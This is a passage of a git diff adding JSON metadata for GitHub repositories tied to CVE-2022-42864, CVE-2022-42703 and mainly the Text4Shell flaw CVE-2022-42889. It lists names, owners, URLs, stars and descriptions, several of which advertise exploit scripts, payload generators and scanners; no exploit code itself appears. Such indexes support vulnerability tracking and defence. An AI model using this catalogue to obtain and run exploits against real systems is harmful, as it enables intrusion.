"watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 701197900, + "name": "linux-4.1.15_CVE-2022-42703", + "full_name": "Satheesh575555\/linux-4.1.15_CVE-2022-42703", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.1.15_CVE-2022-42703", + "description": null, + "fork": false, + "created_at": "2023-10-06T06:18:32Z", + "updated_at": "2023-10-06T06:32:33Z", + "pushed_at": "2023-10-06T07:36:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42864.json b/2022/CVE-2022-42864.json new file mode 100644 index 0000000000..db91473449 --- /dev/null +++ b/2022/CVE-2022-42864.json @@ -0,0 +1,33 @@ +[ + { + "id": 591057092, + "name": "CVE-2022-42864", + "full_name": "Muirey03\/CVE-2022-42864", + "owner": { + "login": "Muirey03", + "id": 31448720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31448720?v=4", + "html_url": "https:\/\/github.com\/Muirey03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muirey03\/CVE-2022-42864", + "description": "Proof-of-concept for the CVE-2022-42864 IOHIDFamily race condition", + "fork": false, + "created_at": "2023-01-19T20:36:49Z", + "updated_at": "2024-09-24T19:37:03Z", + "pushed_at": "2023-01-20T17:58:39Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 62, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42889.json b/2022/CVE-2022-42889.json new file mode 100644 index 0000000000..fe8690c667 --- /dev/null +++ b/2022/CVE-2022-42889.json @@ -0,0 +1,1441 @@ +[ + { + "id": 553123200, + "name": "CVE-2022-42889-PoC", + "full_name": "SeanWrightSec\/CVE-2022-42889-PoC", + "owner": { + "login": "SeanWrightSec", + "id": 41480796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41480796?v=4", + "html_url": "https:\/\/github.com\/SeanWrightSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SeanWrightSec\/CVE-2022-42889-PoC", + "description": "Proof of Concept for the Apache commons-text vulnerability CVE-2022-42889.", + "fork": false, + "created_at": "2022-10-17T18:50:36Z", + "updated_at": "2024-09-21T09:42:47Z", + "pushed_at": "2022-10-20T11:56:13Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": true, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "cve-2022-42889-expliot", + "cybersecurity", + "poc" + ], + "visibility": "public", + "forks": 17, + "watchers": 34, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 553199087, + "name": "text4shell-policy", + "full_name": "chainguard-dev\/text4shell-policy", + "owner": { + "login": "chainguard-dev", + "id": 87436699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87436699?v=4", + "html_url": "https:\/\/github.com\/chainguard-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chainguard-dev\/text4shell-policy", + "description": "ClusterImagePolicy demo for cve-2022-42889 text4shell ", + "fork": false, + "created_at": "2022-10-17T21:49:13Z", + "updated_at": "2024-03-10T21:00:23Z", + "pushed_at": "2023-06-21T11:06:51Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 553446275, + "name": "commons-text-goat", + "full_name": "tulhan\/commons-text-goat", + "owner": { + "login": "tulhan", + "id": 586439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/586439?v=4", + "html_url": "https:\/\/github.com\/tulhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tulhan\/commons-text-goat", + "description": "An intentionally vulnerable webapp to get your hands dirty with CVE-2022-42889.", + "fork": false, + "created_at": "2022-10-18T08:22:55Z", + "updated_at": "2022-10-23T11:42:26Z", + "pushed_at": "2023-04-18T22:24:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 553496497, + "name": "cve-2022-42889-text4shell-docker", + "full_name": "karthikuj\/cve-2022-42889-text4shell-docker", + "owner": { + "login": "karthikuj", + "id": 59091280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59091280?v=4", + "html_url": "https:\/\/github.com\/karthikuj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthikuj\/cve-2022-42889-text4shell-docker", + "description": "Dockerized POC for CVE-2022-42889 Text4Shell", + "fork": false, + "created_at": "2022-10-18T09:58:00Z", + "updated_at": "2024-11-04T12:12:36Z", + "pushed_at": "2022-11-14T17:12:41Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "act4shell", + "apache", + "commons", + "cve", + "cve-2022-42889", + "poc", + "text4shell" + ], + "visibility": "public", + "forks": 32, + "watchers": 75, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 553621408, + "name": "cve-2022-42889", + "full_name": "ClickCyber\/cve-2022-42889", + "owner": { + "login": "ClickCyber", + "id": 66947475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66947475?v=4", + "html_url": "https:\/\/github.com\/ClickCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ClickCyber\/cve-2022-42889", + "description": "cve-2022-42889 Text4Shell CVE-2022-42889 affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10. ", + "fork": false, + "created_at": "2022-10-18T13:53:55Z", + "updated_at": "2024-08-12T20:27:52Z", + "pushed_at": "2022-10-18T14:10:07Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 553879048, + "name": "CVE-2022-42889-POC", + "full_name": "korteke\/CVE-2022-42889-POC", + "owner": { + "login": "korteke", + "id": 2558348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2558348?v=4", + "html_url": "https:\/\/github.com\/korteke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/korteke\/CVE-2022-42889-POC", + "description": "A simple application that shows how to exploit the CVE-2022-42889 vulnerability", + "fork": false, + "created_at": "2022-10-18T23:15:40Z", + "updated_at": "2024-10-11T23:57:40Z", + "pushed_at": "2022-11-06T16:03:44Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "cybersecurity", + "exploit", + "interactsh", + "poc", + "text4shell" + ], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 553930045, + "name": "CVE-2022-42889", + "full_name": "rockmelodies\/CVE-2022-42889", + "owner": { + "login": "rockmelodies", + "id": 24653177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4", + "html_url": "https:\/\/github.com\/rockmelodies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockmelodies\/CVE-2022-42889", + "description": "CVE-2022-42889 dockerized sample application (Apache Commons Text RCE)", + "fork": false, + "created_at": "2022-10-19T01:45:40Z", + "updated_at": "2022-10-18T12:35:44Z", + "pushed_at": "2022-10-17T16:09:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 554046000, + "name": "cve-2022-42889-check", + "full_name": "eunomie\/cve-2022-42889-check", + "owner": { + "login": "eunomie", + "id": 1542321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1542321?v=4", + "html_url": "https:\/\/github.com\/eunomie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eunomie\/cve-2022-42889-check", + "description": null, + "fork": false, + "created_at": "2022-10-19T06:54:57Z", + "updated_at": "2022-10-19T06:57:07Z", + "pushed_at": "2022-10-20T12:54:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 554185839, + "name": "CVE-2022-42889-text4shell", + "full_name": "kljunowsky\/CVE-2022-42889-text4shell", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-42889-text4shell", + "description": "Apache commons text - CVE-2022-42889 Text4Shell proof of concept exploit.", + "fork": false, + "created_at": "2022-10-19T11:49:08Z", + "updated_at": "2024-11-16T11:46:08Z", + "pushed_at": "2023-12-29T14:57:34Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "bug-bounty", + "bug-bounty-hunting", + "bugbounty", + "bugbounty-tool", + "commons-text", + "cve-2022-42889", + "exploit", + "oneliner", + "security", + "security-tools" + ], + "visibility": "public", + "forks": 9, + "watchers": 54, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 554436866, + "name": "text4shell-scan", + "full_name": "securekomodo\/text4shell-scan", + "owner": { + "login": "securekomodo", + "id": 4809643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4", + "html_url": "https:\/\/github.com\/securekomodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securekomodo\/text4shell-scan", + "description": "A fully automated, accurate, and extensive scanner for finding text4shell RCE CVE-2022-42889", + "fork": false, + "created_at": "2022-10-19T20:14:22Z", + "updated_at": "2024-08-12T20:27:54Z", + "pushed_at": "2022-10-20T12:51:08Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 50, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 554494424, + "name": "CVE-2022-42889", + "full_name": "neerazz\/CVE-2022-42889", + "owner": { + "login": "neerazz", + "id": 43318996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43318996?v=4", + "html_url": "https:\/\/github.com\/neerazz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neerazz\/CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-10-19T22:56:12Z", + "updated_at": "2022-10-19T22:59:21Z", + "pushed_at": "2022-10-19T22:58:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "cve-2022-42889-expliot", + "cve-poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554822047, + "name": "cve-2022-42889-intercept", + "full_name": "uk0\/cve-2022-42889-intercept", + "owner": { + "login": "uk0", + "id": 19545292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19545292?v=4", + "html_url": "https:\/\/github.com\/uk0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uk0\/cve-2022-42889-intercept", + "description": "通过 jvm 启动参数 以及 jps pid进行拦截非法参数", + "fork": false, + "created_at": "2022-10-20T13:05:24Z", + "updated_at": "2024-01-12T15:42:59Z", + "pushed_at": "2022-10-21T03:46:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 554968542, + "name": "text4shell-poc", + "full_name": "securekomodo\/text4shell-poc", + "owner": { + "login": "securekomodo", + "id": 4809643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4", + "html_url": "https:\/\/github.com\/securekomodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securekomodo\/text4shell-poc", + "description": "Proof of Concept Appliction for testing CVE-2022-42889", + "fork": false, + "created_at": "2022-10-20T18:07:25Z", + "updated_at": "2024-08-12T20:27:55Z", + "pushed_at": "2022-10-31T16:03:56Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555394668, + "name": "CVE-2022-42889", + "full_name": "humbss\/CVE-2022-42889", + "owner": { + "login": "humbss", + "id": 17453152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17453152?v=4", + "html_url": "https:\/\/github.com\/humbss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/humbss\/CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-10-21T13:48:04Z", + "updated_at": "2022-10-24T03:11:46Z", + "pushed_at": "2022-10-21T14:01:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555540963, + "name": "Text4ShellPayloads", + "full_name": "stavrosgns\/Text4ShellPayloads", + "owner": { + "login": "stavrosgns", + "id": 59849433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59849433?v=4", + "html_url": "https:\/\/github.com\/stavrosgns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stavrosgns\/Text4ShellPayloads", + "description": "This project includes a python script which generates malicious commands leveraging CVE-2022-42889 vulnerability", + "fork": false, + "created_at": "2022-10-21T19:41:56Z", + "updated_at": "2023-09-24T20:21:47Z", + "pushed_at": "2022-10-21T19:57:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555646270, + "name": "CVE-2022-42889", + "full_name": "s3l33\/CVE-2022-42889", + "owner": { + "login": "s3l33", + "id": 60675004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60675004?v=4", + "html_url": "https:\/\/github.com\/s3l33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3l33\/CVE-2022-42889", + "description": "python script for CVE-2022-42889", + "fork": false, + "created_at": "2022-10-22T02:06:40Z", + "updated_at": "2022-10-25T07:40:16Z", + "pushed_at": "2022-10-22T02:53:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 555778524, + "name": "CVE-2022-42889-Text4Shell-Docker", + "full_name": "galoget\/CVE-2022-42889-Text4Shell-Docker", + "owner": { + "login": "galoget", + "id": 8353133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4", + "html_url": "https:\/\/github.com\/galoget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/galoget\/CVE-2022-42889-Text4Shell-Docker", + "description": "Dockerized PoC for CVE-2022-42889 Text4Shell", + "fork": false, + "created_at": "2022-10-22T10:01:13Z", + "updated_at": "2022-10-22T10:03:23Z", + "pushed_at": "2022-10-22T10:03:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 555787805, + "name": "CVE-2022-42889-Text4Shell-Exploit-POC", + "full_name": "rhitikwadhvana\/CVE-2022-42889-Text4Shell-Exploit-POC", + "owner": { + "login": "rhitikwadhvana", + "id": 51850319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51850319?v=4", + "html_url": "https:\/\/github.com\/rhitikwadhvana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhitikwadhvana\/CVE-2022-42889-Text4Shell-Exploit-POC", + "description": "CVE-2022-42889 Text4Shell Exploit POC", + "fork": false, + "created_at": "2022-10-22T10:30:41Z", + "updated_at": "2022-12-13T04:44:38Z", + "pushed_at": "2022-10-22T10:31:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 556131265, + "name": "CVE-2022-42889-POC", + "full_name": "akshayithape-devops\/CVE-2022-42889-POC", + "owner": { + "login": "akshayithape-devops", + "id": 82793140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82793140?v=4", + "html_url": "https:\/\/github.com\/akshayithape-devops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akshayithape-devops\/CVE-2022-42889-POC", + "description": "A simple dockerize application that shows how to exploit the CVE-2022-42889 vulnerability.", + "fork": false, + "created_at": "2022-10-23T05:48:48Z", + "updated_at": "2023-06-26T19:23:44Z", + "pushed_at": "2022-10-23T06:23:03Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556176876, + "name": "Apache-Commons-Text-CVE-2022-42889", + "full_name": "0xmaximus\/Apache-Commons-Text-CVE-2022-42889", + "owner": { + "login": "0xmaximus", + "id": 63053441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63053441?v=4", + "html_url": "https:\/\/github.com\/0xmaximus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmaximus\/Apache-Commons-Text-CVE-2022-42889", + "description": "Apache Text4Shell (CVE-2022-42889) Burp Bounty Profile", + "fork": false, + "created_at": "2022-10-23T08:33:02Z", + "updated_at": "2024-10-03T05:16:40Z", + "pushed_at": "2022-10-23T09:02:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "burp-bounty", + "burp-extensions", + "burp-plugin", + "cve-2022-42889", + "cve-2022-42889-expliot", + "text4shell" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556199653, + "name": "Text4Shell-Scanner", + "full_name": "smileostrich\/Text4Shell-Scanner", + "owner": { + "login": "smileostrich", + "id": 68785480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68785480?v=4", + "html_url": "https:\/\/github.com\/smileostrich", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smileostrich\/Text4Shell-Scanner", + "description": "Vulnerability Scanner for CVE-2022-42889 (Text4Shell)", + "fork": false, + "created_at": "2022-10-23T09:45:41Z", + "updated_at": "2023-04-17T02:29:52Z", + "pushed_at": "2022-10-24T15:00:53Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 556278066, + "name": "CVE-2022-42889-text4shell", + "full_name": "cxzero\/CVE-2022-42889-text4shell", + "owner": { + "login": "cxzero", + "id": 17437230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17437230?v=4", + "html_url": "https:\/\/github.com\/cxzero", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxzero\/CVE-2022-42889-text4shell", + "description": "CVE-2022-42889 aka Text4Shell research & PoC", + "fork": false, + "created_at": "2022-10-23T13:42:23Z", + "updated_at": "2024-10-11T03:18:11Z", + "pushed_at": "2023-03-17T16:15:41Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "poc", + "text4shell" + ], + "visibility": "public", + "forks": 3, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 557311667, + "name": "text4shell-CVE-2022-42889", + "full_name": "Vulnmachines\/text4shell-CVE-2022-42889", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/text4shell-CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-10-25T13:11:24Z", + "updated_at": "2022-10-27T08:30:39Z", + "pushed_at": "2022-10-25T13:15:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561067220, + "name": "CVE-2022-42889", + "full_name": "Gotcha-1G\/CVE-2022-42889", + "owner": { + "login": "Gotcha-1G", + "id": 103347307, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103347307?v=4", + "html_url": "https:\/\/github.com\/Gotcha-1G", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gotcha-1G\/CVE-2022-42889", + "description": "CVE-2022-42889 Blind-RCE Nuclei Template", + "fork": false, + "created_at": "2022-11-02T21:49:55Z", + "updated_at": "2022-11-03T19:50:13Z", + "pushed_at": "2022-11-02T21:51:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561912100, + "name": "CVE-2022-42889-RCE", + "full_name": "cryxnet\/CVE-2022-42889-RCE", + "owner": { + "login": "cryxnet", + "id": 75471375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75471375?v=4", + "html_url": "https:\/\/github.com\/cryxnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cryxnet\/CVE-2022-42889-RCE", + "description": "Proof of Concept for CVE-2022-42889 (Text4Shell Vulnerability) ", + "fork": false, + "created_at": "2022-11-04T19:26:23Z", + "updated_at": "2024-11-24T01:16:48Z", + "pushed_at": "2022-11-21T10:17:03Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "exploit", + "exploits", + "poc", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 562064682, + "name": "CVE-2022-42889-PoC", + "full_name": "sunnyvale-it\/CVE-2022-42889-PoC", + "owner": { + "login": "sunnyvale-it", + "id": 44291039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4", + "html_url": "https:\/\/github.com\/sunnyvale-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2022-42889-PoC", + "description": "CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept", + "fork": false, + "created_at": "2022-11-05T07:32:51Z", + "updated_at": "2023-08-29T21:03:39Z", + "pushed_at": "2022-11-07T07:57:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 562165502, + "name": "cve-2022-42889-jmeter", + "full_name": "QAInsights\/cve-2022-42889-jmeter", + "owner": { + "login": "QAInsights", + "id": 2826376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2826376?v=4", + "html_url": "https:\/\/github.com\/QAInsights", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QAInsights\/cve-2022-42889-jmeter", + "description": "Script to handle CVE 2022-42889", + "fork": false, + "created_at": "2022-11-05T14:08:18Z", + "updated_at": "2024-01-15T15:59:33Z", + "pushed_at": "2022-11-05T15:27:52Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "jmeter" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 562751349, + "name": "Text4shell--Automated-exploit---CVE-2022-42889", + "full_name": "adarshpv9746\/Text4shell--Automated-exploit---CVE-2022-42889", + "owner": { + "login": "adarshpv9746", + "id": 33172696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33172696?v=4", + "html_url": "https:\/\/github.com\/adarshpv9746", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adarshpv9746\/Text4shell--Automated-exploit---CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-11-07T07:19:49Z", + "updated_at": "2022-11-07T07:39:20Z", + "pushed_at": "2022-11-07T09:44:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 568929458, + "name": "Text4shell-exploit", + "full_name": "pwnb0y\/Text4shell-exploit", + "owner": { + "login": "pwnb0y", + "id": 96813659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96813659?v=4", + "html_url": "https:\/\/github.com\/pwnb0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwnb0y\/Text4shell-exploit", + "description": "Python Script to exploit RCE of CVE-2022-42889 ", + "fork": false, + "created_at": "2022-11-21T18:01:28Z", + "updated_at": "2023-11-02T07:39:02Z", + "pushed_at": "2022-11-21T18:17:07Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-common-text", + "cve-2022-42889", + "cve-2022-42889-expliot", + "java-vulnerability", + "rce", + "text4shell", + "text4shell-exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 575527565, + "name": "text4shell-exploit", + "full_name": "gokul-ramesh\/text4shell-exploit", + "owner": { + "login": "gokul-ramesh", + "id": 65040016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65040016?v=4", + "html_url": "https:\/\/github.com\/gokul-ramesh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gokul-ramesh\/text4shell-exploit", + "description": "CVE-2022-42889 - Text4Shell exploit", + "fork": false, + "created_at": "2022-12-07T17:58:59Z", + "updated_at": "2024-08-12T20:28:45Z", + "pushed_at": "2023-03-12T17:06:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "text4shell", + "text4shell-exploit", + "text4shell-poc-exploit" + ], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 576192155, + "name": "text4shellburpscanner", + "full_name": "f0ng\/text4shellburpscanner", + "owner": { + "login": "f0ng", + "id": 48286013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48286013?v=4", + 